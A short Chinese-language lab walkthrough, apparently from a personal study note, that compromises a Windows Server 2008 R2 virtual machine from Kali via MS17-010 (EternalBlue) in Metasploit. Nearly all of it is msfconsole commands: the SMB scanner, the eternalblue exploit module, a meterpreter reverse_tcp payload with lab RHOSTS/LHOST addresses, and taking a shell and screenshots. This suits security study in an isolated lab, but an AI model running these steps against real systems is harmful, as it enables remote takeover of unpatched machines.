-
实验环境:VM Ware15;Kali Liunx;Windows Sercer 2008 R2
-
攻击思路:
1.扫描靶机msf5 > use auxiliary/scanner/smb/smb_ms17_010
2.选择exploituse exploit/windows/smb/ms17_010_eternalblue
3.选择payloadset payload windows/x64/meterpreter/reverse_tcp
4.攻击run/exploit
-
获取IP地址
Kali: ifconfig
Windows: ipconfig
- 启动msf5
在kali终端输入
msfconsole
- 使用ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
Required栏为yes,则Current Setting栏内的值需要进行设置
- 选择exploit
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
- 查看:
show payloads
- 设置payload
set payload windows/x64/meterpreter/reverse_tcp
- 设置靶机和本机IP
set RHOSTS 192.168.177.132
//靶机IP(Windows)
set LHOST 192.168.177.130
//Kali Linux IP
- 攻击
run
[+]表示运行成功
- 获取屏幕截图和shell